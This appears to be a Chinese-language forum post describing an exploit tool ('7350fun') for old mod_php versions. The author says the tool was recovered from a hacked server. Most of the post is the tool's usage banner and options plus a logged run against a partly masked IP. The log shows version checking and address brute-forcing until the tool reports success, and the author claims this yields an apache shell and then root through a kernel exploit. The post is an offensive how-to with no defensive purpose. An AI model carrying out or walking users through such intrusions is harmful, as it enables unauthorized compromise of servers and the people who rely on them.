从一台被黑的服务器上找到了如下工具
fun
此工具专门用来扫描PHP v4.0.2rc1-v4.0.7RC2的exploit程序。找到后通过堆溢出远程得到一个shell,得到root权限就更简单了。用法如下:
[root@linux_server tmp]# ./fun
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.
usage: ./fun [options]
Options:
-c check exploitability only, do not exploit
-n no check mode
-s start bruteforce start (top)
-t target choose target
(1) PHP v4.0.2rc1-v4.0.5
(2) PHP v4.0.6-v4.0.7RC2
经过测试,可以获得一个apache权限的远程shell。然后通过内核溢出程序可以得到本地root了。经过测试Redhat 7.2 服务器得到root权限。
方法如下:
[bob@bob linux_server]$ ./fun -c 202.x.x.x /login.php (验证服务器的php版本)
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.
+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6 (4.0.6,属于可以攻击范围 )
[bob@bob linux_server]$ ./fun -t 2 202.x.x.x /login.php
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.
+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6
+ exploiting the bug now...
[+++-------] trying: bffffecc (开始不断的发送溢出代码到remote server)
[++++++++
[++++++++++
[+++++++---] trying: bffffe80
[+++++++++
[++++++++++] trying: bffffde8
[+---------] trying: bffffde4
[++
[+++++++---] trying: bffffc70
[++++++++
[++++++----] trying: bffff9d4
[+++++++
[++++++++
[+++++-----] trying: bffff9a0
[++++++
[+++++++
[++++++++++] trying: bffff688
[++++++++++] trying: bffff5dc
+ done ... (一个半小时后,系统告诉我成功了) :P
